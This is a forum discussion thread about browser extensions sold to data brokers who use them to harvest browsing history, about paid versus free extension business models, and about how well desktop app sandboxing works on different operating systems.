Many popular browser extensions were bought up by data brokers that use them to exfiltrate browser history, so not sure if they’re underrated, I think you have to be pretty careful as the extension security/privacy model is/was pretty awful. I e.g. know screenshotting extensions (Awesome Screenshot) that would vacuum up your browser history and send it to a data broker in Israel. So probably better to have that as a native browser feature.
> Many popular browser extensions were bought up by data brokers that use them to exfiltrate browser history, so not sure if they’re underrated
I would say, as the developer of an upfront paid web browser extension, that upfront paid web browser extensions are underrated. ;-)
It's a truism that if you're not the customer, you're the product. But what if you are the customer? I think a lot of the mistrust of browser extensions is due to the difficulty in monetizing extensions directly. If you're making nothing from an extension, and someone offers you a nice check to acquire the extension, it can be difficult to turn down that money, especially if the extension is a support burdern for the developer. Of course I have my price too, as almost everyone does, but at this point the price would have to be 7 figures (maybe 8??), which I don't think anyone would ever pay for my extension. My user base is relatively small, and thus doesn't provide a huge opportunity for data collection or other nefarious schemes, precisely because the extension is paid rather than free.
Sidenote: The "collaboration" offers come from time to time even to non-extensions projects, if they are reasonably widely used. E.g. simple tools (rather widely used suite of android apps recently sold).
This is fantastic. Too bad they redacted the names. These scumbags deserve to be known. And the saddest part of the story is you don't know if is true or a cover-up. On the other hand it appears to be MIT. Are Google Chrome extensions reproducible?
Yup, and he won't care about the criminal investigation because from other side of iron curtain v2. But if you're from the side where the nation isn't the cover for criminal enterprise you could get in trouble.
The only difference between a paid and unpaid piece of software is the revenue stream. In a paid software, your incentive to not screw over existing users is because your app would get poorer ratings and you won't acquire new paying customers. I've seen many times where a paid app stops growing as much and turns into a subscription model or becomes unpaid, giving paid users some small benefit (or nothing at all) and starts screwing over all users indiscriminately.
Something that’d help here is if extension galleries displayed price tags and let you filter by paid (bonus points for being able to distinguish between one-time and subscription).
Upfront payment does not exclude further monetization at the expense of the user. If anything, it is a signal that the developer is motivated by money.
> If anything, it is a signal that the developer is motivated by money.
Duh?
Who isn't motivated by money, though? The frequent acquisition of free extensions proves that even open source developers are motivated by money too.
The issue, again, is the identity of the customer. Is the customer you, the extension user, or is the customer the advertisers, making you the product?
Yes. Because of this and the lack of fine-grained permissions mentioned by a sibling comment, I tend to use desktop apps where I can instead of extensions, keeping my extensions list quite slim — basically all I install are FOSS extensions by “big” known-good authors (e.g. Raymond Hill) or projects that aren’t going to sell out.
Of course risks exist with desktop apps too, but historically this kind of buy-and-exfiltrate scheme is comparatively rare with desktop apps, particularly on macOS where signed apps are sandboxed and can’t do a whole lot without user permissions.
> I tend to use desktop apps where I can instead of extensions
How locked down are desktop apps now on Mac, Windows and Linux? I haven't kept up. Do they still a lot of access by default to do malicious things with? I recently saw someone install the Adobe Acrobat desktop app and it installed its own extension inside of Chrome without asking. Games can have scary DRM as well.
Chrome extensions can't read/write to arbitrary places on your hard disk without asking for example and you can isolate them within separate profiles. Not saying they're perfect but there is robust sandboxing of what they're allowed to do. I'm curious how this compares to an Electron-based desktop app i.e. which is running Chrome on the inside but with the standard restrictions Chrome places on tabs and extensions unlocked.
> How locked down are desktop apps now on Mac, Windows and Linux?
It’s hit or miss. There have been advancements on macOS and Linux where there are mobile-style permissions and sandboxing in some cases, but one needs to be aware of how apps are packaged to be able to leverage these advancements. Adobe stuff and Chrome on macOS for example have basically free reign still as they have specifically opted out of OS sandboxing, while a lot of small indie apps are sandboxed. Chrome I think can be put in a sandbox on Linux by way of Flatpak.
Windows has done practically nothing and is the same as it’s always been where desktop apps can do basically whatever they please, especially if given privileges with UAC (which seemingly every other Windows app needs for some reason).
Windows introduced better mobile-style permissions and sandboxing with the APPX format in Windows 8. However the only incentives to use it was the ability to build UWP apps and accessing the Windows Store. Everyone rejected the Windows Store, so developer adoption is close to zero (and now those incentives are gone too)
The bar to write secure desktop software is significantly higher than for browser extensions. Especially with all the Electron crap these days, you're one XSS away from full-blown RCE.
Absolutely, but the short and long terms risk posed to most by installing random browser extensions willy-nilly is still almost certainly higher than that of instead opting for vetted desktop apps, especially if using PWAs in place of Electron apps where possible (which I do).
I’m talking about community vetting. It’s usually easier to find discussions on the internet where people have discussed and scrutinized desktop apps (e.g. “this app phones home”) than it is to find the same for most browser extensions (which are often only heard about after having been turned into malware).
The tooling is often better there too, e.g. one can keep a short leash on app network activity with Little Snitch and similar but I’m not aware of an equivalent for browser extensions.
It's not the lack of a fine grained permissions model, it's the total lack of a real threat model and any consideration at all for what happens as extensions change over time.
>probably better to have that as a native browser feature
/Agree. It is crazy that I have to trust some unknown coder with all my browser data just to enable vertical tabs in Firefox.
Of course many of these extensions are open source and thus auditable. As I lack the skill to detect nefarious code, I am wondering if this might be a good use case for AI. Anyone have thoughts on building a good malware finding prompts?
This is a really great idea and use case. It also makes a ton of sense as a pilot use case for this type of open source project given extensions are smaller in scope.
I mean even having it document a best draft of what the extension code is doing would be awesome.
Unless it’s made into an extension and then you have a recursive hell.
